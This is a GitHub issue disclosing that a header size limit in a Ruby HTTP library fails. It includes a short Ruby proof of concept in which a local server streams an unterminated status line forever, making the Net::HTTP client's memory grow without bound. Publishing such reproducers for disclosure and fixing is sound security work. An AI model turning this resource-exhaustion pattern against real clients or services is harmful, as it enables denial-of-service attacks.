Skip to content

Ineffective request header size limit in #219 #315

Description

@fweimer-rh

We received a vulnerability report that the request header size limit is not truly effective. This reproducer still shows unbound memory growth:

require "socket"
require "net/http"
Thread.new do
  s = TCPServer.new("127.0.0.1", 18080)
  c = s.accept
  c.write("HTTP/1.1 200 ") # deliberately missing newline
  loop { c.write("A" * 16_384) } # continuous stream, no terminator
end
sleep 0.1
Net::HTTP.get(URI("http://127.0.0.1:18080/"))

As #219 was not treated as a vulnerability, I'm filing this issue publicly, too.

Report: AISLE-Report-PSIRTSUPT-15870.md

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Fields

    No fields configured for issues without a type.

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions